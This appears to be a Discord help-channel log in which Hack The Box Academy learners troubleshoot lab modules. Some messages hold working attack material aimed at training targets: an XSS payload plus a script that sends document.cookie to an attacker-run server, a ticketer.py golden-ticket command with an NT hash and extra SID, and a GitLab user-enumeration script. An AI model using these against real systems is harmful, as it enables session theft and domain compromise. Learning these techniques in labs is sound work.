the module in academy would sometimes include the wordlist for you to enumerate at the bottom to save you some time
1 second
No problem.
If you want to delete your post, you can do it yourself. I only delete posts if they violate the rules.
about the openVPN connection type.. when should you consider using TCP instead of UDP? Cause I feel like TCP might be beneficial if the connection is unstable and keyboarding typing doesn't get recognized (you know, you type something on the cli of the target machine, but nothing appears in the command line). Could somebody shed some light on this?
I am by no means experienced enough to answer this, but I just experienced in the "Footprinting Lab - Easy" that i could not connect to the SSH service while being on UDP connection. Worked fine with TCP connection. On the other hand, I had the same exact problem in another lab, but vice versa (UDP working, TCP not).
UDP works better in almost every situation. The difference is sometimes UDP traffic can be blocked by home wifi firewall or the ISP. So TCP works better there. A lot of hacking tools send massive amounts of small packets which makes TCP way slower than UDP
A small typo of the wordlist name in the login brute forcing module - Hybrid Attacks https://academy.hackthebox.com/module/57/section/489
Hello, everyone! Can anyone give me a hint? https://discord.com/channels/473760315293696010/1371087282601197639
Greetings everyone
You can DM.
hello guys can you tell me please how can i mount NFS share? everytime i try to mount it tells me that permission is denied while accessing the share
it happens when i try to use v3 nfs. when i try to use with v2 (as hacktricks suggest me to do) it tells me that "requested NFS version or transport protocol is not supported"
sudo su then access the share after mounting
why cant I write on other channels except here
Get identified, instructions -> #welcome
thank you
finally! thank you so much!
Wrote)
Apologies for the off topic post here in advance. How can I gain 'permission' to post in the other discord channels here such as #general ?
Read and follow #welcome
Thanks! @acoustic owl
Hey, could anyone point me in the right direction for the command injection skills assessment?
yes whats up
check msg
You can read the file instead of trying to write over it.
Anybody ever had a problem with virtual box when it dosent detect any input ?
Im on ubuntu
Hi hi, I got a small question,
I'm currently doing the module for metasploit framework -> modules
there is an nmap output like
nmap -sV 10.10.10.40
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-13 21:38 UTC
Stats: 0:00:50 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Nmap scan report for 10.10.10.40
Host is up (0.051s latency).
Not shown: 991 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.87 seconds
after this, the module explains port 445 is open (as seen in the nmap output) and instantly goes to booting up msf to run MS17_010. Is there a way how i should make this connection? should this be 'common knowledge' to know what exploit to run when seeing an nmap output like this one ?
No, it's not 'common knowledge' to know what exploit to use simply from an nmap scan. You need to know which services are running, inspect them all, interact with them, try to get the version and see if there are any exploits for it, etc. In this case, 445 simply means it's running SMB which is for file sharing. The first thing I'd try with something like that is connecting to the share to see which files, if any, are available to guest/anonymous users if I don't have credentials. You can try something like eternalblue, but that's like super low hanging fruit and 99.99% of the time it's not going to work.
thank you, i guess it's for the sake of the module that they push eternalblue so you use msfconsole. i just found the jump odd considering there was nothing that signifies the exploit and the next step... is the exploit 😅
yeah i think it's just showcasing it and it's an 'easy' exploit
@minor plover how about no
yeah okay sure
This might be a dumb question but if you are using the virtual instance by connecting via the browser you do not need to use a VPN correct?
The pwnbox does not require connecting to the VPN, it uses your VPN file to connect automatically.
hey, has anyone else had issues with the Web Requests -GET Target System, when you go into the browser web developer tool and run the search you do not get the request for the Search.php come through
Did you open the dev tools first, then navigate/refresh the site, or did you open devtools afterwards? You need it open before you make the request I think.
Thanks for the reply, I am getting the issue "too many fingerprints" on the nmap OS detection challenge and I read on the HTB forums it can be due to incorrect VPN but it seems it is not releavant here.
i opened and refreshed then made the search request and got nothing
I will figure it out
Yeah I'd make sure you're targeting the right thing. I'm reading that error simply means nmap can't determine the OS.
even when i had a scan through the walk through help i had done everything correct just no search would be requested
make sure you have spun up the new target and not trying to target an old one from your clipboard
i have done this plenty of times
And you're in the network tab?
yes
That should show any requests you make.
i know but i kept getting 403 404
well 404 means page can't be found, but you should still see the request in devtools
ill redo it now and see if it happened again and send SS if it happens
but was just wondering if anyone else was having the same issue
ive managed to get past it now as i already knew to use the ||?search=flag|| to get what i needed
ey guys good evening still i'm stuck hahahaha
day 65 xD
the life of hacker is very hard xD
anyone here also having issues with psexec.py?
python3 /usr/share/doc/python3-impacket/examples/psexec.py inlanefreight.local/REDACTED:'REDACTED'@172.16.XX.XX
Traceback (most recent call last):
File "/usr/share/doc/python3-impacket/examples/psexec.py", line 33, in <module>
from impacket import version, smb
File "/usr/lib/python3/dist-packages/impacket/version.py", line 10, in <module>
import pkg_resources
File "/home/REDACTED/.local/lib/python3.13/site-packages/pkg_resources/__init__.py", line 2191, in <module>
register_finder(pkgutil.ImpImporter, find_on_path)
^^^^^^^^^^^^^^^^^^^
AttributeError: module 'pkgutil' has no attribute 'ImpImporter'. Did you mean: 'zipimporter'?
what if you just do impacket-psexec?
$ impacket-psexec
Traceback (most recent call last):
File "/usr/share/doc/python3-impacket/examples/psexec.py", line 33, in <module>
from impacket import version, smb
File "/usr/lib/python3/dist-packages/impacket/version.py", line 10, in <module>
import pkg_resources
File "/home/REDACTED/.local/lib/python3.13/site-packages/pkg_resources/__init__.py", line 2191, in <module>
register_finder(pkgutil.ImpImporter, find_on_path)
^^^^^^^^^^^^^^^^^^^
AttributeError: module 'pkgutil' has no attribute 'ImpImporter'. Did you mean: 'zipimporter'?
should i simply update impackket-psexec?
Try Python 3.10 or 3.13, looks like 3.13+ removed pkgutil.ImpImporter which impacket needs.
so what happens if new students use 3.13+ on newer kali machines?
You can use an older version of python. You can have more than one version installed. As for your kali question, idk, I'm on the latest kali and don't get that error. maybe update python? i'm on 3.13.2
ahh yeah that could be it
thanks for the heads up though, im more confident reinstalling everything since it should work with newer installations now that you mention using 3.13.2
Can somebody help me with the HTTP Response splitting please? I can successfully set my own cookie with Set-Cookie and steal it to the logs, but for some reason when I send this crafted payload url to the admin it just logs the entire url instead? I dont understand.
might be the wrong place to ask but does UTM VMs still work on M1 chip macs with sonoma ?
Yup
No issues here
UTM is awesome
In the HTTP Response Splitting why is it when im sending my link that works to the admin its just getting logged instead of executing?
The /lucky.php page has a button that appears to be disabled. Try to enable the button, and then click it to get the flag.
Skills Assessment - Using Web Proxies
Im having issues figuring out what to do right here
I know what im supposed to do, just cant seem to execute it
Am I supposed to be injecting into the log? then the admin visits the log?
Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload)
Skills Assessment - Using Web Proxies
I'm trying to submit my model (skills_assessment.joblib) in the Applications of AI in Infosec module, but it keeps returning invalid model. Any help would be appreciated.
The CPTS module with creating shells threw me for a loop with the war exploit. Jeez
I have a problem with attacking common aplications with the attacking ColdFusion part, can someone help me?
hey everyone, wondering if people are bothering with installing a Windows VM? I completed the SOC analyst path completely in ParrotOS, but now starting to work on Sherlocks and one of them made me think if I should have a Windows VM ready to go for the exam. Specifically thinking about opening .evtx files or running Eric Zimmerman tools. I believe Unit42 sherlock write up is done on a Windows VM, and they just double-click/open an .evtx file. When I completed that sherlock, I parsed the file into raw xml file and ran grep on it through the terminal in ParrotOS.
I haven't taken CDSA nor taken the path so take this with a grain of salt, but I would prepare to use anything and everything taught in the path. If that requires access to a Windows machine, yes you'll probably want something setup with all the tools in place before you begin.
Is anyone familiar with mounting a bitlocker .vhd file
let me specialize my question. I am working on trying to mount a .vhd bitlocker via linux. from what I understand I need to use qemu-nbd and cryptsetup. I have a partition created under /dev/NBDop2 and when I attempt to use cryptsetup it mentions my partition is not a valid BITLK device. I made sure to make it a ext4 but I don't really see a exact answer of how to.
sudo cryptsetup bitlkOpen /dev/nbd0p2
Device /dev/nbd0p2 is not a valid BITLK device.
I think i have a idea on how to bring it over. see the issue is the I can't exactly get into the users account but I can via SMB. so cmd. however I can rdp into the same computer but different user. I am currently uploading the vhd to the user with access.
via evil-winrm
I think then I can use what you recommend.
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
welp I see why now, I can't bring it to windows. any users are popped up with a UAC so I do need it to be mounted via linux to avoid the UAC.
On the Academy Modules Layout (https://academy.hackthebox.com/module/90/section/1559) in the pentesting job role, do I need to go through the list of recommened modules in order as someone who is entirely new to the world of IT and cybersecurity to be able to get a foothold on the subjects discussed in future modules?
Yes, no doubt about it.
maybe not all, e.g. JavaScript Obfuscation, or OSINT: Corporate Recon but mainly those in the InformationSecurityFoundations path
But in General I'd recommend doing the Information Security Foundations path before taking the Pentester Job path
Hello i am new here
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Hi, does anyone having the same problem with me, I’m taking the applications of ai in infosec module, in the network anomaly section, I followed everything but I keep getting invalid model file, what is the problem?
Hi mate! I had a lot of probs with this as well, when you create a new project in VS, do NOT,
I repeat do NOT choose "new console application" from the rightmost panel, instead search for 'framework' in the rightmost panel (or pick the choice to the left if present named '.Net Framework'), then select "new console application (.NET Framework)".
Create the code, build (in release) and now you good to go.
I realized I did something wrong, since the file I generated before was not possible to run under the target-machine, either I got the "The application to execute does not exist: 'C:\Windows\tasks\NotMalware.dll'" or simply "You must install .NET to run this application." if the .dll was present.
So case is we built from the wrong .Net template, We built from .Net, should've built from .Net Framework.
Edit: layout of paragraphs.
Or you can spawn a PowerShell as the user you want and use your file transfer knowledge to get it back on a local Windows machine 😉
Hey, in the “ACL Enumeration” there is this command, but it’s taking forever to run… was able to run bloodhound and it took less time.
Anyone remembers if it takes that much time or if you ran a different command?
Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $gpo_group_sid}
Sometimes these commands will pickup things that bloodhound misses, but yeah, they do usually take a little more time to run.
Yes thats normal, in Powershell can take a long time, maybe because its using 1 thread and bloodhound/sharphound using a lot more threads, but not 100% sure.
pm me
Hey, i'm at "Applications of AI in InfoSec" doing the "IMDB sentiment" skills assessment and ran into something odd (bug in Academy?).
I trained a simple scikit-learn model (TF-IDF + Logistic Regression), saved it with joblib, and it gets about 89 % accuracy when I test it locally.
The upload API reply always:
{
"accuracy": 0.0,
"metrics": null,
"misclassified": []
}
So it looks like the model runs fine, but the accuracy number is 0.0%
Could someone take a quick look or let me know what i'm doing wrong?
Let me know if you want the exported file
I am on AD attacks & enum skill assessment 2, question 10. I found the user name from Bloodhound. I am struggling to find the hash. Can I get a nudge?
More or less how far into the Academy modules should we be to start working on HTB machines? Should I finish the PenTest path completely first?
I’m still waiting for any group admins or mod to reply me as if I use cmd with admin then I can see SeTakeOwnershipPrivilege disabled but if I try to Import-Module the elevate ps1 script it doesn’t even work in Powershell
There’s no way to achieve the desired output with the specific priv escalation method until if we manually use other tactics to owned the system
Think about what you did when you first started the SA, but now try something similar from windows.
Is the difference Linux vs Windows, or are ||the systems on different networks||?
You can DM
im stuck on Password Attacks - easy labs, i have tried crackmap and also hydra, to crack ftp with the given username.list and password.list/ also the mutated.list but nothing, if i could get a tip on this. I waited almost 2h for hydra for nothing.
Link: https://academy.hackthebox.com/module/147/section/1334
I would say that going through the starting point boxes is a great idea to start off with. Then, using 0xdf or ippsec walkthroughs to help you through the other boxes 🙂
You can DM the commands you've been trying.
Oh no I was definitely able to get it into the machine with ease the problem is starting up the mount drive is when UAC hits me
It’s a pain, using the resources is the correct move but it takes forever, I got a tad hint from a HTB forum I’d read those if I were you. But yea I spent 3 hours trying to wait till it cracked.
anything going on with modules right now? When I click the link to go into them, it's not working
nvm, was a glitch on my side apparently
Just leaving a tip in case someone is having trouble with RDP and SOCKS Tunneling with SocksOverRDP (Cannot connect to jason host)
You probably installed proxifier in the wrong host and is trying to connect from the wrong host too.
DM me
is the ai red teamer path going to become a cert eventually?
🤷♂️
Can anyone help with the Password attacks section Passwd,Shadow and Opasswd. I’m trying to crack the yescrypt hash with hashcat and John the ripper. Using a mutated password list. Any recommendations?
I think this is not necessary?
Which part
you have the credentials from Will?
Yeah I sshed in copied the back up files to my attack box
I’m trying to crack the root hash in the shadow file
the .bak files?
I’ve tried what feels like everything
Yeah
Using hashcat it would say token length exception
it should work with john and the mut_password list
Evan bro give me a DM if you can't figure any thing out with black sky👍
try john
Will do
Great
I’m running it right now
Hi All, qq im getting an error when running gobuster vhost -u http://inlanefreight.htb:81 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain
Error: error on running gobuster: unable to connect to http://83.136.252.13/: Get "http://83.136.252.13/": dial tcp 83.136.252.13:80: connect: connection refused. in the Information Gathering - Web Edition Vhost section. any ideas? the target is spawn and i can ping it but does not seem to be able to enumerate the vhosts.
Did you add the IP address to the /etc/hosts file?
gobuster vhost -u http://inlanefreight.htb:43995 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain
I think it should be look like this
I ran John - -format= crypt /file path to shadow /hashes - -wordlist:/ mutpassword.list path
And nothing
In my hash folder it has root:$y$j9T$1FyAd7.T1R9XTboO8.W571$ZguG.oxTSdzTOP0zLUqsY4ONGApmQOfPYZjot4BGlm2:0:0:root:/root:/bin/bash
Hello 👋
Whenever I am trying to text something in off topic general it redirect me to this module section ? Why ? Is there is some criteria ? With I need to fulfill in this module ?
Did you solve it? 😄
working on crackmapexec skill assessment question 1.
I really need some advice.
- indicates my chisel setup.
- indicates the /etc/proxychains4.conf socks5 at 1080, also tried socks4
- indicates my attempt to nxc or crackmapexec trying access to nmap. I also tried different IPs, 172.16.15.1 - 172.16.15.10 but no luck. This has been 7 hours just trying to get the setup. I also tried different machines, mac and kali. Any pointer will be appreciated. feels like i am doing the same thing over and over again.
Hi, no i did not
I tried got same error
can someone help me pls, i got 2 virtual machines. First is htb virtual parrot and second is Windows. I need to transfer zip archive from linux to windows. But my Windows virtual machine doesnt got access to internet. How can i transfer zip??
@gloomy stump thanks, you where right, i needed to add the ip address to the host file so it could resolve the domain locally. Thanks for the help 🙂
you're welcome 🙂
Shared folder?
Hello Guys, So I am facing issue in Attacking Domain Trusts - Child -> Parent Trusts - from Windows in the active directory enumeration and attack module
the problem is after doing rdp into the attack machine there are no tools folder present
I have tried spawning new machines 3 to 4 times
If Your windows has ssh use SCP
scp /path/to/local/file username@windows_ip:/path/to/destination
😓
ty!
Anyone Please help
Transfer your tools? If you use xfreerdp use /drive:kali,,
I tried that but faced some issues, I will try again Thanks for the suggestion
Have you checked c:\tools?
If accessibility is the issue, there are a couple of ways to transfer files
SMB, RDP, HTTP
yes It was not there But I have transferred the tools now
after running the tools I face new issue
this indicates I don't have enough permission to dump the hash
it looks like they are in the C:\htb folder from the example
Thanks I found them. And sorry for wasting everyone's time
Try to repeat what you learned in this section to identify the vulnerable input field and find a working XSS payload, and then use the 'Session Hijacking' scripts to grab the Admin's cookie and use it in 'login.php' to get the flag.
I done
"><script src=http://10.129.255.239:1337/script.js></script>
I opened a php server using "sudo php -S 0.0.0.0:1337"
I made the php file and the script.js file, the script.js will execute the php, the php script captures the cookie for me
and didnt get anything
module: session hijacking
hello 🙂
Hello hibooxx
how are you 🙂
tired, been struggling with the module for a little
so close to completing but, struggling right now
which module ?
Cross-Site Scripting (XSS)
oww I've finished this one. What are you stuck on?
session hijacking
the javascript file doesn't seem to be executing
"><script src=http://10.129.255.239:1337/script.js></script>
'><script src=http://10.129.255.239:1337/script.js></script>
tried both common payloads
script.js is created , php file is created,
im also running the php server with "sudo php -S 0.0.0.0:1337"
it's obvious the imgurl input box is vulnerable, due to the contents im seeing
hmmm wait have you created an index.php to retrieve the request on your server?
yes
umm.... i think i found the issue lmao
I wasnt even in the directory
oh still didnt even capture the cookie
maybe you may have tested the wrong field
hmm okay let's try different ones
a tip: to test an xss, I put the payload on all the fields with the name of the field to see which field is vulnerable when the request is intercepted.
okay
http://10.129.255.239/hijacking/?fullname=asda&username=asdadawd&password=asjuhdanl&email=asdjubihan%40gmail.com&imgurl=asdawdas
got what was sent
so i test each input according to /fullname "
/username /password /email /imgurl ?
I mean on each field I would put for example ‘><script src=http://10.129.255.239:1337/fullname></script>
oh yeah
there will be an error on the server and the field will be vulnerable
Just did for each, and ensured changing /fullname to according field names and still got no response
mhmmmm is trying to relaunch the challenge
yess for a fresh server
I'm trying to do it again on my side as it's been a long time ahah
how long did it take you to get CPTS
1 year old lol I nearly lost my hair
damnn
no experience in penetration testing for the more experienced it takes less time
ooh i see
they gave me the same new ip lol
Not getting anything still
what payload did you put in script.js?
this
new Image().src='http://10.129.255.239:1337/index.php?c='+document.cookie;
same ip and port being used
by pure chance try with a " for the following payload: "><script src=http://10.129.255.239:1337/fullname></script>, but it seems strange to me because you have the right method
He’s using the Target IP it looks like, should be sending it to your Attack Machine IP where the server listener is hosted
owh shit thank you, I forgot to ask for this precision, in fact you need to put your IP in the test payload xss
"><script src=http://YOURIP:1337/fullname></script>
wait so in the field it's my local ip?
Captured the cookie it was supposed to be the local ip, however, upon going into the storage it doesnt let me add it in
done it
gj
on the final part the skills assessment
Hi, if I subscribe to the Gold Annual Plan, will I get one or two certificates? And if I don’t take the exam during the subscription period, will I lose the exam chance?
Hi
I'm a beginner, and I would like to know the right way to start learning in this field. How should I begin? Are there any platforms that can help me become a professional? I hope to hear back from you.
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
the annual plans come with a single voucher per year
SOC analyst course I am stuck for 2 weeks there, cant paste a screenshot here with an exact question and details, but can anyone help me with one assignment
guys I am having a big issue, can someone please help
I read forums but it didn't work
I was following along the windows fundamentals and ran a command
Just mention the module/section/question you're on and what you've tried etc. You can post a screen shot only from tier 0 modules. Anything above that is against the rules. You can ask someone to take it to DM if you feel like you need to reveal more, but people have done the modules so they don't really need the context of screen shots etc.
this one on my /home//user/document
sudo mount -t cifs -o username=htb-student,password=YourPassword //SERVER_IP/"Company Data" /home/user/Desktop/
and suddenly my document folder is gone
everything in there vanished, all my notes and projects till now
Introduction To The Elastic Stack 2 assignments at the end - is this the right chat to ask? I dont have a permission to text in many of those chats here
like it's there but nothing in it except a file which says this
[ViewState]
Mode=
Vid=
FolderType=Generic
this is fucked up, everything I had done till this point in time gone
This channel is for talk about the modules on HTB. If that's part of a module yes. To gain access to most of the channels on the server you need to follow the instructions in #welcome.
Can anyone narrow down the bruteforcing for "Find another valid user on the target GitLab instance."
Its literally rate limited and names.txt (for instance) is a massive list. HTB is sadistic for this
I did and it blocked my message
i copied my ID and it says it is blocked
someone recommended me this discord that I can find help here
but I see many ppl are typing with problems and no one is helping
its gonna take time
is there any specific person that helps with htb modules
Nope, just whoever in the community wants to help
just ask your question and be patient
it is the whole assignment not one question. I will probably email hack the box I literally did nothing for 2 weeks because I dont know what to do.
that's not a module
did you mean introduction to threat hunting & hunting with elastic?
just articulate your question and ask and maybe someone can help.
Introduction To The Elastic Stack yes
how to do it: Navigate to http://[Target IP]:5601, click on the side navigation toggle, and click on "Discover". Then, click on the calendar icon, specify "last 15 years", and click on "Apply". Finally, choose the "windows*" index pattern. Now, execute the KQL query that is mentioned in the "Comparison Operators" part of this section and enter the username of the disabled account as your answer. Just the username; no need to account for the domain. I have no idea. I tried
i followed this of course
when I typed this http://[Target IP]:5601 it doesnt go anywhere - the captcha turns on and ask to indicate the hydrant- and this never ends, then busses etc and Im stuck there for 2 weeks always the same
Did you spawn the target and enter the IP of the target you spawned in place of Target IP?
then it tells me to do it again and again "try again"
I downloaded whatever there was
opened the spawn machine typed that http target
oh what am I doing wrong
this file that i downloaded doesn't want to open
There's no download I think. You just visit the target you spawn on that port.
It's a web app
i don't remember any captcha, you should really specify exactly which module and section you're on
this one Introduction To The Elastic Stack: What Is The Elastic Stack? and the two bottom questions
ok that module is security monitoring & siem fundamentals
I also emailed them . Yes it is
soc analyst path
oh wow my login is displayed here just noticed that
I was so excited for this soc analyst and then I got stuck and tried over and over to move forward, read forums. And nothing worked
Anyone around willing to take a quick lookieloo at the Wordpress Skills Assessment in CBBH? It's acting like the Wordpress site's database is corrupted or maybe misconfigured or something.
what url are you putting in your browser
It works fine, you just need to wait an extra 5-10 mins for the elastic instance to startup
theres also nothing needed to download or login
yeah. hard to get info out of him though. i just tested and there is no captcha either.
sounds like he went to some phishing site instead
Hi, I had student subscription for a while now. I've been wondering if it s possible to stop the subscription and then go back to it ?
Since I will be a bit busy for this month to learn at academy. If I unsubscribe can I resubscribe as a student again ?
yes
Thank you
anybody with an idea how to change POST data on intercepting web requests, bug bounty path, introduction to web proxies
in "web proxies" module there is a part with ZAP scanner
Run ZAP Scanner on the target above to identify directories and potential vulnerabilities. Once you find the high-level vulnerability, try to use it to read the flag at '/flag.txt'
i found the flag, but it does not wanna accept it
can anybody help me with it?
Have you checked if there's any trailing/leading spaces in your flag?
hooly, i had a space before the flag
thanks
Yall I'm making a pc to start my cyber security learning I am at 0 rn
My pc have these
32gb ram
1tb storage
Rtx 3060
Ryzen 5 5600x
Total cost 1000$
Is it good
?
swap the rtx 3060 out for a 5060ti, might as well they're the same price
make sure you get the 16gb though
Hey guys, I want to give feedback regarding:
https://academy.hackthebox.com/module/75/section/763
What is the CVSS score of the public vulnerability CVE-2017-0144?
The question is unspecified, since the CVSS 3.0 score is around 8 and the expected value is based on CVSS 2.0 and therefore around 9.
You may want to specify it. If it's not here to place feedback, please tell me where to correctly place it.
thx
Did you check the hint
Hey, if your answer is regarding my request, I have already found the answer. But the question should ask for CVSS2 to specify the expected value. I know its a beginners module, but I just want to improve the question.
Hey, After using psexec I got shell in DC but I am unable to navigate to tools folder because whenever I use command dir it gives error and gets stuck every time. I need tools like mimikatz to dump hash for user
@neat crest
15 min for that captcha to disappear?
Captcha is blocking me it asks me to select fire hydrant for a few min and then nothing happens
@thorny kraken
No problem
Could you run it in powershell? Does that help?
Let me try
what module is this?
Active directory enumeration and exploitation and attacking domain trusts from child to parent using Linux
After launching powershell and using ls still it got stuck
just dir C:\Users\Administrator\Desktop
Tools are not present in desktop
oh youre looking for tools
I need to get hash for bross user
Yes
do you know where the tools folder is
I don't know the exact location majority of the time it's under c drive but when I try to navigate there boom no directory found and nor I can list directories
This is the question - Perform the ExtraSids attack to compromise the parent domain from the Linux attack host. After compromising the parent domain obtain the NTLM hash for the Domain Admin user bross. Submit this hash as your answer.
have you tried dir C:\Tools
yes, I will try again and share screenshot
you'll have to get the NTLM hash some other way then
Can you please suggest some other ways?
Because I am unable to import tools also
if you understand how the ExtraSids attack works, then you should be able to come up with a way
if you have creds, cant you use secretsdump.py ?
yes
Okay I think I can use winrm to get shell
you don't need a shell
I don't have exact credentials I have used ticketer.py to get golden ticket in which I used psexec
Let me try by just the golden ticket
you have a golden ticket, that's all you need
Just a second I have tried that But it gave error dumping I will try again
Okay I have got the problem The sid attack is not successful I will try again and fix it
@dark hedge @neat crest
interesting module
maybe read the error message
that means the user dont have the rights
yes
it means that my user is not there But i have created the golden ticket and loaded it But why is it showing client not found
Kerberos is a mysterious beast
if the attack doesn't work with a user that doesn't exist, then...
But I have created a fake user using this command- ticketer.py -nthash 9d765b482771505cbe97411065964d5f -domain LOGISTICS.INLANEFREIGHT.LOCAL -domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 hacker
rethink the data points you need to carry out the attack
Okay, Let me try again
Footprinting Lab - Medium
Footprinting
https://academy.hackthebox.com/module/112/section/1079
I can't seem to find the user for the one question
On RDP and SOCKS Tunneling with SocksOverRDP.
I rdp into ACADEMY-PIVOTING-WIN10PIV. Copy move over SocksOverRDP-x64.zip, and ProxifierPE.zip. Disable realtime protection.
On WIN10PIV I register the plugin dll, it is successful.
RDP into 172.16.5.19 where I disable defender. I run SocksOverRDP-Server.exe as admin, then run Proxifier and add the 127.0.0.1 with port 1080 as default route. I cannot rdp into 172.16.6.155, getting this message in Proxifier: [05.13 07:12:01] mstsc.exe (5544) *64 - 172.16.6.155:3389 error : Could not connect to proxy.
The Listener on WIN10PIV is active. Not sure what to do here
Do you have admin access?
Where are you looking?
ayo guys, idk if it's on this channel where I'm supposed to ask for help, i'm a beginner so idk if it's on the right channel, anyways
How can I get tech support for HSB? Account help
does anyone know how to change from htb-student to bob.smith user so I can get the SID?
I've tried what's written on the Hint but couldn't get access, I have already bobs.smith -> Get-ChildItem but idk how to change users
I assume you can RDP into the target with htb-student and enumerate the SID of that user.
Need to speak to a person? Learn how to reach our support via HTB Labs.
is there anyone here that could please help me with linux privilege escalation module?
The credentials provided for AD Trust Attacks § Unconstrained Delegation (https://academy.hackthebox.com/module/253/section/2803) don't work at all:
$ xfreerdp3 /v:10.129.229.207 /d:inlanefreight.ad /auth-pkg-list:!kerberos,ntlm /u:Administrator /p:'HTB_@cademy_adm!' /dynamic-resolution /cert:ignore /timeout:99999 /w:2880 /h:1620 /drive:'C',.
[08:39:47:006] [1918541:001d464e] [WARN][com.freerdp.client.x11] - [load_map_from_xkbfile]: : keycode: 0x08 -> no RDP scancode found
[08:39:47:006] [1918541:001d464e] [WARN][com.freerdp.client.x11] - [load_map_from_xkbfile]: : keycode: 0x5D -> no RDP scancode found
[08:39:48:860] [1918541:001d464e] [ERROR][com.freerdp.core] - [nla_recv_pdu]: ERRCONNECT_LOGON_FAILURE [0x00020014]
[08:39:48:860] [1918541:001d464e] [ERROR][com.freerdp.core.rdp] - [rdp_recv_callback_int][0x5d34b8b3a240]: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[08:39:48:860] [1918541:001d464e] [ERROR][com.freerdp.core.rdp] - [rdp_recv_callback_int][0x5d34b8b3a240]: CONNECTION_STATE_NLA status STATE_RUN_FAILED [-1]
[08:39:48:860] [1918541:001d464e] [ERROR][com.freerdp.core.transport] - [transport_check_fds]: transport_check_fds: transport->ReceiveCallback() - STATE_RUN_FAILED [-1]
i've been stuck on Miscellaneous Techniques section where I have to hack into a weak NFS which has been configured poorly with no_squash_root
report to #1234357888114364508. discord moderators are not necessarily HTB staff
I tried to compile the code on my systems but it appears my GCC version is too new, so then I created a VM and installed GCC 7.5.0 but that had issues compiling the payload and shell.c, I tried to locate an old ISO file of ubuntu warty something which is the exact same uname -r but no luck 😦, the VM didn't want to boot up
Going to give the Attacking Common Applications the lowest rating for the module bc of the Attacking GitLab
It was so try hard. So time consuming. Couldve provided a much better hint to narrow it down. Seemed sadistic and unreasonable
huh, not the thick-client applications sections?
Also this will help speed up the process a bit:
└──╼ $cat gitlab_enum_fast.sh
#!/usr/bin/env bash
URL="$1"
WORDLIST="$2"
# sanity check
if [[ -z "$URL" || -z "$WORDLIST" ]]; then
  echo "Usage: $0 <base-url> <userlist>"
  exit 1
fi
export URL
export PARALLEL_READ_TIMEOUT=0
parallel --jobs 30 --bar '
  code=$(curl -s -o /dev/null -w "%{http_code}" "${URL}/{}")
  if [[ $code -eq 200 ]]; then
    echo "[+] {} exists"
  fi
' :::: "$WORDLIST"
ohno I got that listed for the CPTS
Bro, its absolutely ridiculous. Im sorry. Best we can do is give it a low rating and provide feedback as to why
Hi. Stuck on the first assessment for the Active Directory Enumeration & Attacks topic. I'm trying to use Get-DomainUser, but I keep getting the error "The term 'Get-DomainUser' is not recognized as the name of a cmdlet, function, script file, or
operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again."
Have to import PowerView first
I did. I uploaded it from the HTB vm and that command went through fine, just not the Get-DomainUser
Anyone wants to do password cracking module with me? I will be starting it after completion of my active directory enumeration and attacks module. Need a partner because studying alone is very boring.
I will @cold star but I am not very good just a networking student wanting to learn more
same, I am also not good in cyber security AD one was the first module of hack the box I started.
If your PowerShell session is complaining that whatever cmdlet you’re trying to run isn’t recognized as a cmdlet, most probably it isn’t a valid command in your PS session. You can run Get-Command and see if it’s there. If you import PowerView, it should be there
I had completed red teaming path from try hack me before that (though it was useless)
nah, it can't, that's what I tried first but since the user gotta be bob.smith when I powershell it, it says user htb-student
I have no idea what module/section you're working on, but there is likely something covered in it that can be used.
Hi, can someone help me with Intro to C2 Operations with Sliver -> SA-> Q4. I have completely looted dc02 (dc02 admin and dc02 krbtgt) and now I need to abuse the domains trust somehow. I guess I need to make a diamond or gold ticket, I have done both but I still can't access DC01. Not sure which part I am doing wrong.
I'm doing "Windows Fundamentals" and yeah, pretty sure is something that I know but I'm not thinking right
;back
I have a few minutes to spare, so if you want to DM I can check out what you are trying.
really appreciate it man, but im a free user, i already terminated the session there so I can only use it again tomorrow but i'll see if I can solve it tomorrow, and in case I can't, i'll dm you, tysm
All good.
It's weird because I used powerview from 6 different github resources, including from the course resource and it's still not coming up. (PowerShellMafia, darkoperator, PowerShellEmpire, lucky-luk3, nettitude) . I'm still digging for others to find one that works
Ok
How are you importing it to your PS session?
Try htb-student creds
ricky am I stuck on Linux Privilege Escalation Miscellaneous Techniques the weak NFS share is there another way I could think outside the box?
I tried configuring GCC 7.5.0 on a VM, but missing some random dependencies
I tried hunting for the exact uname -r of ubuntu, which was like warty something (I have screenshots but VM doesn't want to boot fully)
I could use the cloud VM on HTB but I want to try and configure or solve it another way
many tools make life interesting 😄 and sometimes a different view can provide different insight
Import-Module .\Powerview.ps1
Will try that later, although the module is literally providing instructions to use Administrator:HTB_@cademy_adm! which it shouldn't if the htb-student creds are correct.
Can you throw the screenshots?
It should’ve imported all PowerView’s cmdlets
I hear ya, but a little nxc and curiosity led me to some information and I'm just passing it along.
You can DM if you are still stuck.
ok thanks Ricky
